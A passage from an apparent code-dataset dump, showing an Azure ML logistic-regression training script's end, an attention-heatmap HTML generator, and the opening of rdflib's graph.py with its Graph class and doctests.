X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=0)
# Train a logistic regression model
print('Training a logistic regression model with regularization rate of', reg)
run.log('Regularization Rate', np.float(reg))
model = LogisticRegression(C=1/reg, solver="liblinear").fit(X_train, y_train)
# calculate accuracy
y_hat = model.predict(X_test)
acc = np.average(y_hat == y_test)
print('Accuracy:', acc)
run.log('Accuracy', np.float(acc))
# calculate AUC
y_scores = model.predict_proba(X_test)
auc = roc_auc_score(y_test,y_scores[:,1])
print('AUC: ' + str(auc))
run.log('AUC', np.float(auc))
os.makedirs('outputs', exist_ok=True)
# note file saved in the outputs folder is automatically uploaded into experiment record
joblib.dump(value=model, filename='outputs/diabetes_model.pkl')
run.complete() | 37.080645 | 174 | 0.77251 |
4a27e62bd86932f44883ba5c7db8012df411c4be | 2,859 | py | Python | code/utils.py | Run542968/Self_Attention_Pytorch | 35b5c520904c709f35a9d3e44c0cdba92a35d10b | [
"Apache-2.0"
] | null | null | null | code/utils.py | Run542968/Self_Attention_Pytorch | 35b5c520904c709f35a9d3e44c0cdba92a35d10b | [
"Apache-2.0"
] | null | null | null | code/utils.py | Run542968/Self_Attention_Pytorch | 35b5c520904c709f35a9d3e44c0cdba92a35d10b | [
"Apache-2.0"
] | null | null | null | from codecs import open
import torch
def visualize_attention(wts,x_test_pad,word_to_id,filename):
wts_add = torch.sum(wts,1)
wts_add_np = wts_add.data.numpy()
wts_add_list = wts_add_np.tolist()
print(wts_add_list)
print(len(wts_add_list))
id_to_word = {v:k for k,v in word_to_id.items()}
text= []
for test in x_test_pad:
text.append(" ".join([id_to_word.get(i) for i in test]))
createHTML(text, wts_add_list, filename)
print("Attention visualization created for {} samples".format(len(x_test_pad)))
return
def createHTML(texts, weights, fileName):
fileName = "visualization/" + fileName
fOut = open(fileName, "w", encoding="utf-8")
part1 = """
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<style>
body {
font-family: Sans-Serif;
}
</style>
</head>
<body>
<h3>
Heatmaps
</h3>
</body>
<script>
"""
part2 = """
var color = "255,0,0";
var ngram_length = 3;
var half_ngram = 1;
for (var k=0; k < any_text.length; k++) {
var tokens = any_text[k].split(" ");
var intensity = new Array(tokens.length);
var max_intensity = Number.MIN_SAFE_INTEGER;
var min_intensity = Number.MAX_SAFE_INTEGER;
for (var i = 0; i < intensity.length; i++) {
intensity[i] = 0.0;
for (var j = -half_ngram; j < ngram_length-half_ngram; j++) {
if (i+j < intensity.length && i+j > -1) {
intensity[i] += trigram_weights[k][i + j];
}
}
if (i == 0 || i == intensity.length-1) {
intensity[i] /= 2.0;
} else {
intensity[i] /= 3.0;
}
if (intensity[i] > max_intensity) {
max_intensity = intensity[i];
}
if (intensity[i] < min_intensity) {
min_intensity = intensity[i];
}
}
var denominator = max_intensity - min_intensity;
for (var i = 0; i < intensity.length; i++) {
intensity[i] = (intensity[i] - min_intensity) / denominator;
}
if (k%2 == 0) {
var heat_text = "<p><br><b>Example:</b><br>";
} else {
var heat_text = "<b>Example:</b><br>";
}
var space = "";
for (var i = 0; i < tokens.length; i++) {
heat_text += "<span style='background-color:rgba(" + color + "," + intensity[i] + ")'>" + space + tokens[i] + "</span>";
if (space == "") {
space = " ";
}
}
//heat_text += "<p>";
document.body.innerHTML += heat_text;
}
</script>
</html>"""
putQuote = lambda x: "\"%s\"" % x
textsString = "var any_text = [%s];\n" % (",".join(map(putQuote, texts)))
weightsString = "var trigram_weights = [%s];\n" % (",".join(map(str, weights)))
fOut.write(part1)
fOut.write(textsString)
fOut.write(weightsString)
fOut.write(part2)
fOut.close()
return
| 28.306931 | 124 | 0.564533 |
4a27e6de72ab7c0fd56731ed9995d1ba7d1ad357 | 66,785 | py | Python | rdflib/graph.py | mwatts15/rdflib | 047e3e9781a28966ff9b6fd46ec20e459a5a0f11 | [
"BSD-3-Clause"
] | 1 | 2021-08-09T16:32:00.000Z | 2021-08-09T16:32:00.000Z | rdflib/graph.py | mwatts15/rdflib | 047e3e9781a28966ff9b6fd46ec20e459a5a0f11 | [
"BSD-3-Clause"
] | null | null | null | rdflib/graph.py | mwatts15/rdflib | 047e3e9781a28966ff9b6fd46ec20e459a5a0f11 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from rdflib.term import Literal # required for doctests
assert Literal # avoid warning
from rdflib.namespace import Namespace # required for doctests
assert Namespace # avoid warning
__doc__ = """\
RDFLib defines the following kinds of Graphs:
* :class:`~rdflib.graph.Graph`
* :class:`~rdflib.graph.QuotedGraph`
* :class:`~rdflib.graph.ConjunctiveGraph`
* :class:`~rdflib.graph.Dataset`
Graph
-----
An RDF graph is a set of RDF triples. Graphs support the python ``in``
operator, as well as iteration and some operations like union,
difference and intersection.
see :class:`~rdflib.graph.Graph`
Conjunctive Graph
-----------------
A Conjunctive Graph is the most relevant collection of graphs that are
considered to be the boundary for closed world assumptions. This
boundary is equivalent to that of the store instance (which is itself
uniquely identified and distinct from other instances of
:class:`Store` that signify other Conjunctive Graphs). It is
equivalent to all the named graphs within it and associated with a
``_default_`` graph which is automatically assigned a :class:`BNode`
for an identifier - if one isn't given.
see :class:`~rdflib.graph.ConjunctiveGraph`
Quoted graph
------------
The notion of an RDF graph [14] is extended to include the concept of
a formula node. A formula node may occur wherever any other kind of
node can appear. Associated with a formula node is an RDF graph that
is completely disjoint from all other graphs; i.e. has no nodes in
common with any other graph. (It may contain the same labels as other
RDF graphs; because this is, by definition, a separate graph,
considerations of tidiness do not apply between the graph at a formula
node and any other graph.)
This is intended to map the idea of "{ N3-expression }" that is used
by N3 into an RDF graph upon which RDF semantics is defined.
see :class:`~rdflib.graph.QuotedGraph`
Dataset
-------
The RDF 1.1 Dataset, a small extension to the Conjunctive Graph. The
primary term is "graphs in the datasets" and not "contexts with quads"
so there is a separate method to set/retrieve a graph in a dataset and
to operate with dataset graphs. As a consequence of this approach,
dataset graphs cannot be identified with blank nodes, a name is always
required (RDFLib will automatically add a name if one is not provided
at creation time). This implementation includes a convenience method
to directly add a single quad to a dataset graph.
see :class:`~rdflib.graph.Dataset`
Working with graphs
===================
Instantiating Graphs with default store (IOMemory) and default identifier
(a BNode):
>>> g = Graph()
>>> g.store.__class__
<class 'rdflib.plugins.memory.IOMemory'>
>>> g.identifier.__class__
<class 'rdflib.term.BNode'>
Instantiating Graphs with a IOMemory store and an identifier -
<http://rdflib.net>:
>>> g = Graph('IOMemory', URIRef("http://rdflib.net"))
>>> g.identifier
rdflib.term.URIRef(u'http://rdflib.net')
>>> str(g) # doctest: +NORMALIZE_WHITESPACE
"<http://rdflib.net> a rdfg:Graph;rdflib:storage
[a rdflib:Store;rdfs:label 'IOMemory']."
Creating a ConjunctiveGraph - The top level container for all named Graphs
in a 'database':
>>> g = ConjunctiveGraph()
>>> str(g.default_context)
"[a rdfg:Graph;rdflib:storage [a rdflib:Store;rdfs:label 'IOMemory']]."
Adding / removing reified triples to Graph and iterating over it directly or
via triple pattern:
>>> g = Graph()
>>> statementId = BNode()
>>> print(len(g))
0
>>> g.add((statementId, RDF.type, RDF.Statement))
>>> g.add((statementId, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g.add((statementId, RDF.predicate, RDFS.label))
>>> g.add((statementId, RDF.object, Literal("Conjunctive Graph")))
>>> print(len(g))
4
>>> for s, p, o in g:
... print(type(s))
...
<class 'rdflib.term.BNode'>
<class 'rdflib.term.BNode'>
<class 'rdflib.term.BNode'>
<class 'rdflib.term.BNode'>
>>> for s, p, o in g.triples((None, RDF.object, None)):
... print(o)
...
Conjunctive Graph
>>> g.remove((statementId, RDF.type, RDF.Statement))
>>> print(len(g))
3
``None`` terms in calls to :meth:`~rdflib.graph.Graph.triples` can be
thought of as "open variables".
Graph support set-theoretic operators, you can add/subtract graphs, as
well as intersection (with multiplication operator g1*g2) and xor (g1
^ g2).
Note that BNode IDs are kept when doing set-theoretic operations, this
may or may not be what you want. Two named graphs within the same
application probably want share BNode IDs, two graphs with data from
different sources probably not. If your BNode IDs are all generated
by RDFLib they are UUIDs and unique.
>>> g1 = Graph()
>>> g2 = Graph()
>>> u = URIRef(u'http://example.com/foo')
>>> g1.add([u, RDFS.label, Literal('foo')])
>>> g1.add([u, RDFS.label, Literal('bar')])
>>> g2.add([u, RDFS.label, Literal('foo')])
>>> g2.add([u, RDFS.label, Literal('bing')])
>>> len(g1 + g2) # adds bing as label
3
>>> len(g1 - g2) # removes foo
1
>>> len(g1 * g2) # only foo
1
>>> g1 += g2 # now g1 contains everything
Graph Aggregation - ConjunctiveGraphs and ReadOnlyGraphAggregate within
the same store:
>>> store = plugin.get('IOMemory', Store)()
>>> g1 = Graph(store)
>>> g2 = Graph(store)
>>> g3 = Graph(store)
>>> stmt1 = BNode()
>>> stmt2 = BNode()
>>> stmt3 = BNode()
>>> g1.add((stmt1, RDF.type, RDF.Statement))
>>> g1.add((stmt1, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g1.add((stmt1, RDF.predicate, RDFS.label))
>>> g1.add((stmt1, RDF.object, Literal("Conjunctive Graph")))
>>> g2.add((stmt2, RDF.type, RDF.Statement))
>>> g2.add((stmt2, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g2.add((stmt2, RDF.predicate, RDF.type))
>>> g2.add((stmt2, RDF.object, RDFS.Class))
>>> g3.add((stmt3, RDF.type, RDF.Statement))
>>> g3.add((stmt3, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g3.add((stmt3, RDF.predicate, RDFS.comment))
>>> g3.add((stmt3, RDF.object, Literal(
... "The top-level aggregate graph - The sum " +
... "of all named graphs within a Store")))
>>> len(list(ConjunctiveGraph(store).subjects(RDF.type, RDF.Statement)))
3
>>> len(list(ReadOnlyGraphAggregate([g1,g2]).subjects(
... RDF.type, RDF.Statement)))
2
ConjunctiveGraphs have a :meth:`~rdflib.graph.ConjunctiveGraph.quads` method
which returns quads instead of triples, where the fourth item is the Graph
(or subclass thereof) instance in which the triple was asserted:
>>> uniqueGraphNames = set(
... [graph.identifier for s, p, o, graph in ConjunctiveGraph(store
... ).quads((None, RDF.predicate, None))])
>>> len(uniqueGraphNames)
3
>>> unionGraph = ReadOnlyGraphAggregate([g1, g2])
>>> uniqueGraphNames = set(
... [graph.identifier for s, p, o, graph in unionGraph.quads(
... (None, RDF.predicate, None))])
>>> len(uniqueGraphNames)
2
Parsing N3 from a string
>>> g2 = Graph()
>>> src = '''
... @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
... @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
... [ a rdf:Statement ;
... rdf:subject <http://rdflib.net/store#ConjunctiveGraph>;
... rdf:predicate rdfs:label;
... rdf:object "Conjunctive Graph" ] .
... '''
>>> g2 = g2.parse(data=src, format='n3')
>>> print(len(g2))
4
Using Namespace class:
>>> RDFLib = Namespace('http://rdflib.net/')
>>> RDFLib.ConjunctiveGraph
rdflib.term.URIRef(u'http://rdflib.net/ConjunctiveGraph')
>>> RDFLib['Graph']
rdflib.term.URIRef(u'http://rdflib.net/Graph')
"""
import logging
logger = logging.getLogger(__name__)
# import md5
import random
import warnings
from hashlib import md5
from rdflib.namespace import RDF, RDFS, SKOS
from rdflib import plugin, exceptions, query
from rdflib.term import Node, URIRef, Genid
from rdflib.term import BNode
import rdflib.term
from rdflib.paths import Path
from rdflib.store import Store
from rdflib.serializer import Serializer
from rdflib.parser import Parser
from rdflib.parser import create_input_source
from rdflib.namespace import NamespaceManager
from rdflib.resource import Resource
from rdflib.collection import Collection
import os
import shutil
import tempfile
from six import BytesIO
from six import b
from six.moves.urllib.parse import urlparse
__all__ = [
'Graph', 'ConjunctiveGraph', 'QuotedGraph', 'Seq',
'ModificationException', 'Dataset',
'UnSupportedAggregateOperation', 'ReadOnlyGraphAggregate']
class Graph(Node):
"""An RDF Graph
The constructor accepts one argument, the 'store'
that will be used to store the graph data (see the 'store'
package for stores currently shipped with rdflib).
Stores can be context-aware or unaware. Unaware stores take up
(some) less space but cannot support features that require
context, such as true merging/demerging of sub-graphs and
provenance.
The Graph constructor can take an identifier which identifies the Graph
by name. If none is given, the graph is assigned a BNode for its
identifier.
For more on named graphs, see: http://www.w3.org/2004/03/trix/
"""
def __init__(self, store='default', identifier=None,
namespace_manager=None):
super(Graph, self).__init__()
self.__identifier = identifier or BNode()
if not isinstance(self.__identifier, Node):
self.__identifier = URIRef(self.__identifier)
if not isinstance(store, Store):
# TODO: error handling
self.__store = store = plugin.get(store, Store)()
else:
self.__store = store
self.__namespace_manager = namespace_manager
self.context_aware = False
self.formula_aware = False
self.default_union = False
def __get_store(self):
return self.__store
store = property(__get_store) # read-only attr
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier) # read-only attr
def _get_namespace_manager(self):
if self.__namespace_manager is None:
self.__namespace_manager = NamespaceManager(self)
return self.__namespace_manager
def _set_namespace_manager(self, nm):
self.__namespace_manager = nm
namespace_manager = property(_get_namespace_manager,
_set_namespace_manager,
doc="this graph's namespace-manager")
def __repr__(self):
return "<Graph identifier=%s (%s)>" % (self.identifier, type(self))
def __str__(self):
if isinstance(self.identifier, URIRef):
return ("%s a rdfg:Graph;rdflib:storage " +
"[a rdflib:Store;rdfs:label '%s'].") % (
self.identifier.n3(),
self.store.__class__.__name__)
else:
return ("[a rdfg:Graph;rdflib:storage " +
"[a rdflib:Store;rdfs:label '%s']].") % (
self.store.__class__.__name__)
def toPython(self):
return self
def destroy(self, configuration):
"""Destroy the store identified by `configuration` if supported"""
self.__store.destroy(configuration)
# Transactional interfaces (optional)
def commit(self):
"""Commits active transactions"""
self.__store.commit()
def rollback(self):
"""Rollback active transactions"""
self.__store.rollback()
def open(self, configuration, create=False):
"""Open the graph store
Might be necessary for stores that require opening a connection to a
database or acquiring some resource.
"""
return self.__store.open(configuration, create)
def close(self, commit_pending_transaction=False):
"""Close the graph store
Might be necessary for stores that require closing a connection to a
database or releasing some resource.
"""
self.__store.close(
commit_pending_transaction=commit_pending_transaction)
def add(self, triple):
"""Add a triple with self as context"""
s, p, o = triple
assert isinstance(s, Node), \
"Subject %s must be an rdflib term" % (s,)
assert isinstance(p, Node), \
"Predicate %s must be an rdflib term" % (p,)
assert isinstance(o, Node), \
"Object %s must be an rdflib term" % (o,)
self.__store.add((s, p, o), self, quoted=False)
def addN(self, quads):
"""Add a sequence of triple with context"""
self.__store.addN((s, p, o, c) for s, p, o, c in quads
if isinstance(c, Graph) and
c.identifier is self.identifier and
_assertnode(s, p, o)
)
def remove(self, triple):
"""Remove a triple from the graph
If the triple does not provide a context attribute, removes the triple
from all contexts.
"""
self.__store.remove(triple, context=self)
def triples(self, triple):
"""Generator over the triple store
Returns triples that match the given triple pattern. If triple pattern
does not provide a context, all contexts will be searched.
"""
s, p, o = triple
if isinstance(p, Path):
for _s, _o in p.eval(self, s, o):
yield (_s, p, _o)
else:
for (s, p, o), cg in self.__store.triples((s, p, o), context=self):
yield (s, p, o)
def __getitem__(self, item):
"""
A graph can be "sliced" as a shortcut for the triples method
The python slice syntax is (ab)used for specifying triples.
A generator over matches is returned,
the returned tuples include only the parts not given
>>> import rdflib
>>> g = rdflib.Graph()
>>> g.add((rdflib.URIRef('urn:bob'), rdflib.RDFS.label, rdflib.Literal('Bob')))
>>> list(g[rdflib.URIRef('urn:bob')]) # all triples about bob
[(rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'), rdflib.term.Literal(u'Bob'))]
>>> list(g[:rdflib.RDFS.label]) # all label triples
[(rdflib.term.URIRef(u'urn:bob'), rdflib.term.Literal(u'Bob'))]
>>> list(g[::rdflib.Literal('Bob')]) # all triples with bob as object
[(rdflib.term.URIRef(u'urn:bob'), rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'))]
Combined with SPARQL paths, more complex queries can be
written concisely:
Name of all Bobs friends:
g[bob : FOAF.knows/FOAF.name ]
Some label for Bob:
g[bob : DC.title|FOAF.name|RDFS.label]
All friends and friends of friends of Bob
g[bob : FOAF.knows * '+']
etc.
.. versionadded:: 4.0
"""
if isinstance(item, slice):
s, p, o = item.start, item.stop, item.step
if s is None and p is None and o is None:
return self.triples((s, p, o))
elif s is None and p is None:
return self.subject_predicates(o)
elif s is None and o is None:
return self.subject_objects(p)
elif p is None and o is None:
return self.predicate_objects(s)
elif s is None:
return self.subjects(p, o)
elif p is None:
return self.predicates(s, o)
elif o is None:
return self.objects(s, p)
else:
# all given
return (s, p, o) in self
elif isinstance(item, (Path, Node)):
return self.predicate_objects(item)
else:
raise TypeError("You can only index a graph by a single rdflib term or path, or a slice of rdflib terms.")
def __len__(self):
"""Returns the number of triples in the graph
If context is specified then the number of triples in the context is
returned instead.
"""
return self.__store.__len__(context=self)
def __iter__(self):
"""Iterates over all triples in the store"""
return self.triples((None, None, None))
def __contains__(self, triple):
"""Support for 'triple in graph' syntax"""
for triple in self.triples(triple):
return True
return False
def __hash__(self):
return hash(self.identifier)
def __cmp__(self, other):
if other is None:
return -1
elif isinstance(other, Graph):
return cmp(self.identifier, other.identifier)
else:
# Note if None is considered equivalent to owl:Nothing
# Then perhaps a graph with length 0 should be considered
# equivalent to None (if compared to it)?
return 1
def __eq__(self, other):
return isinstance(other, Graph) \
and self.identifier == other.identifier
def __lt__(self, other):
return (other is None) \
or (isinstance(other, Graph) and
self.identifier < other.identifier)
def __le__(self, other):
return self < other or self == other
def __gt__(self, other):
return (isinstance(other, Graph) and
self.identifier > other.identifier) \
or (other is not None)
def __ge__(self, other):
return self > other or self == other
def __iadd__(self, other):
"""Add all triples in Graph other to Graph.
BNode IDs are not changed."""
self.addN((s, p, o, self) for s, p, o in other)
return self
def __isub__(self, other):
"""Subtract all triples in Graph other from Graph.
BNode IDs are not changed."""
for triple in other:
self.remove(triple)
return self
def __add__(self, other):
"""Set-theoretic union
BNode IDs are not changed."""
retval = Graph()
for (prefix, uri) in set(
list(self.namespaces()) + list(other.namespaces())):
retval.bind(prefix, uri)
for x in self:
retval.add(x)
for y in other:
retval.add(y)
return retval
def __mul__(self, other):
"""Set-theoretic intersection.
BNode IDs are not changed."""
retval = Graph()
for x in other:
if x in self:
retval.add(x)
return retval
def __sub__(self, other):
"""Set-theoretic difference.
BNode IDs are not changed."""
retval = Graph()
for x in self:
if not x in other:
retval.add(x)
return retval
def __xor__(self, other):
"""Set-theoretic XOR.
BNode IDs are not changed."""
return (self - other) + (other - self)
__or__ = __add__
__and__ = __mul__
# Conv. methods
def set(self, triple):
"""Convenience method to update the value of object
Remove any existing triples for subject and predicate before adding
(subject, predicate, object).
"""
(subject, predicate, object_) = triple
assert subject is not None, \
"s can't be None in .set([s,p,o]), as it would remove (*, p, *)"
assert predicate is not None, \
"p can't be None in .set([s,p,o]), as it would remove (s, *, *)"
self.remove((subject, predicate, None))
self.add((subject, predicate, object_))
def subjects(self, predicate=None, object=None):
"""A generator of subjects with the given predicate and object"""
for s, p, o in self.triples((None, predicate, object)):
yield s
def predicates(self, subject=None, object=None):
"""A generator of predicates with the given subject and object"""
for s, p, o in self.triples((subject, None, object)):
yield p
def objects(self, subject=None, predicate=None):
"""A generator of objects with the given subject and predicate"""
for s, p, o in self.triples((subject, predicate, None)):
yield o
def subject_predicates(self, object=None):
"""A generator of (subject, predicate) tuples for the given object"""
for s, p, o in self.triples((None, None, object)):
yield s, p
def subject_objects(self, predicate=None):
"""A generator of (subject, object) tuples for the given predicate"""
for s, p, o in self.triples((None, predicate, None)):
yield s, o
def predicate_objects(self, subject=None):
"""A generator of (predicate, object) tuples for the given subject"""
for s, p, o in self.triples((subject, None, None)):
yield p, o
def triples_choices(self, triple, context=None):
subject, predicate, object_ = triple
for (s, p, o), cg in self.store.triples_choices(
(subject, predicate, object_), context=self):
yield (s, p, o)
def value(self, subject=None, predicate=RDF.value, object=None,
default=None, any=True):
"""Get a value for a pair of two criteria
Exactly one of subject, predicate, object must be None. Useful if one
knows that there may only be one value.
It is one of those situations that occur a lot, hence this
'macro' like utility
Parameters:
subject, predicate, object -- exactly one must be None
default -- value to be returned if no values found
any -- if True, return any value in the case there is more than one,
else, raise UniquenessError
"""
retval = default
if (subject is None and predicate is None) or \
(subject is None and object is None) or \
(predicate is None and object is None):
return None
if object is None:
values = self.objects(subject, predicate)
if subject is None:
values = self.subjects(predicate, object)
if predicate is None:
values = self.predicates(subject, object)
try:
retval = next(values)
except StopIteration:
retval = default
else:
if any is False:
try:
next(values)
msg = ("While trying to find a value for (%s, %s, %s) the"
" following multiple values where found:\n" %
(subject, predicate, object))
triples = self.store.triples(
(subject, predicate, object), None)
for (s, p, o), contexts in triples:
msg += "(%s, %s, %s)\n (contexts: %s)\n" % (
s, p, o, list(contexts))
raise exceptions.UniquenessError(msg)
except StopIteration:
pass
return retval
def label(self, subject, default=''):
"""Query for the RDFS.label of the subject
Return default if no label exists or any label if multiple exist.
"""
if subject is None:
return default
return self.value(subject, RDFS.label, default=default, any=True)
def preferredLabel(self, subject, lang=None, default=None,
labelProperties=(SKOS.prefLabel, RDFS.label)):
"""
Find the preferred label for subject.
By default prefers skos:prefLabels over rdfs:labels. In case at least
one prefLabel is found returns those, else returns labels. In case a
language string (e.g., 'en', 'de' or even '' for no lang-tagged
literals) is given, only such labels will be considered.
Return a list of (labelProp, label) pairs, where labelProp is either
skos:prefLabel or rdfs:label.
>>> from rdflib import ConjunctiveGraph, URIRef, RDFS, Literal
>>> from rdflib.namespace import SKOS
>>> from pprint import pprint
>>> g = ConjunctiveGraph()
>>> u = URIRef(u'http://example.com/foo')
>>> g.add([u, RDFS.label, Literal('foo')])
>>> g.add([u, RDFS.label, Literal('bar')])
>>> pprint(sorted(g.preferredLabel(u)))
[(rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'),
rdflib.term.Literal(u'bar')),
(rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'),
rdflib.term.Literal(u'foo'))]
>>> g.add([u, SKOS.prefLabel, Literal('bla')])
>>> pprint(g.preferredLabel(u))
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'bla'))]
>>> g.add([u, SKOS.prefLabel, Literal('blubb', lang='en')])
>>> sorted(g.preferredLabel(u)) #doctest: +NORMALIZE_WHITESPACE
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'bla')),
(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'blubb', lang='en'))]
>>> g.preferredLabel(u, lang='') #doctest: +NORMALIZE_WHITESPACE
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'bla'))]
>>> pprint(g.preferredLabel(u, lang='en'))
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'blubb', lang='en'))]
"""
if default is None:
default = []
# setup the language filtering
if lang is not None:
if lang == '': # we only want not language-tagged literals
def langfilter(l): return l.language is None
else:
def langfilter(l): return l.language == lang
else: # we don't care about language tags
def langfilter(l): return True
for labelProp in labelProperties:
labels = list(filter(langfilter, self.objects(subject, labelProp)))
if len(labels) == 0:
continue
else:
return [(labelProp, l) for l in labels]
return default
def comment(self, subject, default=''):
"""Query for the RDFS.comment of the subject
Return default if no comment exists
"""
if subject is None:
return default
return self.value(subject, RDFS.comment, default=default, any=True)
def items(self, list):
"""Generator over all items in the resource specified by list
list is an RDF collection.
"""
chain = set([list])
while list:
item = self.value(list, RDF.first)
if item is not None:
yield item
list = self.value(list, RDF.rest)
if list in chain:
raise ValueError("List contains a recursive rdf:rest reference")
chain.add(list)
def transitiveClosure(self, func, arg, seen=None):
"""
Generates transitive closure of a user-defined
function against the graph
>>> from rdflib.collection import Collection
>>> g=Graph()
>>> a=BNode('foo')
>>> b=BNode('bar')
>>> c=BNode('baz')
>>> g.add((a,RDF.first,RDF.type))
>>> g.add((a,RDF.rest,b))
>>> g.add((b,RDF.first,RDFS.label))
>>> g.add((b,RDF.rest,c))
>>> g.add((c,RDF.first,RDFS.comment))
>>> g.add((c,RDF.rest,RDF.nil))
>>> def topList(node,g):
... for s in g.subjects(RDF.rest,node):
... yield s
>>> def reverseList(node,g):
... for f in g.objects(node,RDF.first):
... print(f)
... for s in g.subjects(RDF.rest,node):
... yield s
>>> [rt for rt in g.transitiveClosure(
... topList,RDF.nil)] # doctest: +NORMALIZE_WHITESPACE
[rdflib.term.BNode('baz'),
rdflib.term.BNode('bar'),
rdflib.term.BNode('foo')]
>>> [rt for rt in g.transitiveClosure(
... reverseList,RDF.nil)] # doctest: +NORMALIZE_WHITESPACE
http://www.w3.org/2000/01/rdf-schema#comment
http://www.w3.org/2000/01/rdf-schema#label
http://www.w3.org/1999/02/22-rdf-syntax-ns#type
[rdflib.term.BNode('baz'),
rdflib.term.BNode('bar'),
rdflib.term.BNode('foo')]
"""
if seen is None:
seen = {}
elif arg in seen:
return
seen[arg] = 1
for rt in func(arg, self):
yield rt
for rt_2 in self.transitiveClosure(func, rt, seen):
yield rt_2
def transitive_objects(self, subject, property, remember=None):
"""Transitively generate objects for the ``property`` relationship
Generated objects belong to the depth first transitive closure of the
``property`` relationship starting at ``subject``.
"""
if remember is None:
remember = {}
if subject in remember:
return
remember[subject] = 1
yield subject
for object in self.objects(subject, property):
for o in self.transitive_objects(object, property, remember):
yield o
def transitive_subjects(self, predicate, object, remember=None):
"""Transitively generate objects for the ``property`` relationship
Generated objects belong to the depth first transitive closure of the
``property`` relationship starting at ``subject``.
"""
if remember is None:
remember = {}
if object in remember:
return
remember[object] = 1
yield object
for subject in self.subjects(predicate, object):
for s in self.transitive_subjects(predicate, subject, remember):
yield s
def seq(self, subject):
"""Check if subject is an rdf:Seq
If yes, it returns a Seq class instance, None otherwise.
"""
if (subject, RDF.type, RDF.Seq) in self:
return Seq(self, subject)
else:
return None
def qname(self, uri):
return self.namespace_manager.qname(uri)
def compute_qname(self, uri, generate=True):
return self.namespace_manager.compute_qname(uri, generate)
def bind(self, prefix, namespace, override=True, replace=False):
"""Bind prefix to namespace
If override is True will bind namespace to given prefix even
if namespace was already bound to a different prefix.
if replace, replace any existing prefix with the new namespace
for example: graph.bind('foaf', 'http://xmlns.com/foaf/0.1/')
"""
return self.namespace_manager.bind(
prefix, namespace, override=override, replace=replace)
def namespaces(self):
"""Generator over all the prefix, namespace tuples"""
for prefix, namespace in self.namespace_manager.namespaces():
yield prefix, namespace
def absolutize(self, uri, defrag=1):
"""Turn uri into an absolute URI if it's not one already"""
return self.namespace_manager.absolutize(uri, defrag)
def serialize(self, destination=None, format="xml",
base=None, encoding=None, **args):
"""Serialize the Graph to destination
If destination is None serialize method returns the serialization as a
string. Format defaults to xml (AKA rdf/xml).
Format support can be extended with plugins,
but 'xml', 'n3', 'turtle', 'nt', 'pretty-xml', 'trix', 'trig' and 'nquads' are built in.
"""
serializer = plugin.get(format, Serializer)(self)
if destination is None:
stream = BytesIO()
serializer.serialize(stream, base=base, encoding=encoding, **args)
return stream.getvalue()
if hasattr(destination, "write"):
stream = destination
serializer.serialize(stream, base=base, encoding=encoding, **args)
else:
location = destination
scheme, netloc, path, params, _query, fragment = urlparse(location)
if netloc != "":
print("WARNING: not saving as location" +
"is not a local file reference")
return
fd, name = tempfile.mkstemp()
stream = os.fdopen(fd, "wb")
serializer.serialize(stream, base=base, encoding=encoding, **args)
stream.close()
if hasattr(shutil, "move"):
shutil.move(name, path)
else:
shutil.copy(name, path)
os.remove(name)
def parse(self, source=None, publicID=None, format=None,
location=None, file=None, data=None, **args):
"""
Parse source adding the resulting triples to the Graph.
The source is specified using one of source, location, file or
data.
:Parameters:
- `source`: An InputSource, file-like object, or string. In the case
of a string the string is the location of the source.
- `location`: A string indicating the relative or absolute URL of the
source. Graph's absolutize method is used if a relative location
is specified.
- `file`: A file-like object.
- `data`: A string containing the data to be parsed.
- `format`: Used if format can not be determined from source.
Defaults to rdf/xml. Format support can be extended with plugins,
but 'xml', 'n3', 'nt', 'trix', 'rdfa' are built in.
- `publicID`: the logical URI to use as the document base. If None
specified the document location is used (at least in the case where
there is a document location).
:Returns:
- self, the graph instance.
Examples:
>>> my_data = '''
... <rdf:RDF
... xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'
... xmlns:rdfs='http://www.w3.org/2000/01/rdf-schema#'
... >
... <rdf:Description>
... <rdfs:label>Example</rdfs:label>
... <rdfs:comment>This is really just an example.</rdfs:comment>
... </rdf:Description>
... </rdf:RDF>
... '''
>>> import tempfile
>>> fd, file_name = tempfile.mkstemp()
>>> f = os.fdopen(fd, 'w')
>>> dummy = f.write(my_data) # Returns num bytes written on py3
>>> f.close()
>>> g = Graph()
>>> result = g.parse(data=my_data, format="application/rdf+xml")
>>> len(g)
2
>>> g = Graph()
>>> result = g.parse(location=file_name, format="application/rdf+xml")
>>> len(g)
2
>>> g = Graph()
>>> with open(file_name, "r") as f:
... result = g.parse(f, format="application/rdf+xml")
>>> len(g)
2
>>> os.remove(file_name)
"""
source = create_input_source(source=source, publicID=publicID,
location=location, file=file,
data=data, format=format)
if format is None:
format = source.content_type
if format is None:
# raise Exception("Could not determine format for %r. You can" + \
# "expicitly specify one with the format argument." % source)
format = "application/rdf+xml"
parser = plugin.get(format, Parser)()
try:
parser.parse(source, self, **args)
finally:
if source.auto_close:
source.close()
return self
def load(self, source, publicID=None, format="xml"):
self.parse(source, publicID, format)
def query(self, query_object, processor='sparql',
